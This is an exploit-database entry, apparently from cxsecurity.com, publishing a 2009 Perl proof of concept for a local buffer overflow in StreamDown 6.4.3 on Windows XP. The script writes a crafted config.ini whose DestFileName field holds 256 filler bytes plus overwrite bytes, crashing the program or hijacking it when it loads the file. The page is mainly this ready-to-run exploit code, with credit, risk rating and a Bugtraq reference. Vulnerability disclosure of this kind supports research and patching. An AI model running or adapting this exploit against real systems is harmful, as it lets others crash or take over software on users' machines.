StreamDown v6.4.3 Local Buffer Overflow PoC

2009.02.05
Credit: Todor Donev
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

#!perl # # StreamDown v6.4.3 Local Buffer Overflow Exploit (0day) # ------------------------------------------------------- # Research & Exploit [Todor Donev :: todor.donev_at_gmail.com] # ------------------------------------------------------- # Shareware software for downloading and stream ripping # # Tested on Windows XP SP3 # Proof Of Concept # # Best regards and be safe, # Todor Donev # $overflow = "\x41" x 256; $x = "\x05\x01"; open(my $config, "> config.ini"); print $config "[SnifferPos]\n". "X=300\n". "Y=5\n". "state=0\n". "[TimeOut]\n". "Default=30\n". "[Proxy]\n". "server=\n". "port=\n". "enable=0\n". "[DestPath]\n". "Default=c:MyDownloads\n". "[Down]\n". "Count=1\n". "[0]\n". "URL=\n". "DestFileName=c:MyDownloadshttp". $overflow.$x."\n". "State=5\n". "TotalSize=0\n"; close $config;

References:

http://seclists.org/bugtraq/2009/Feb/0031.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top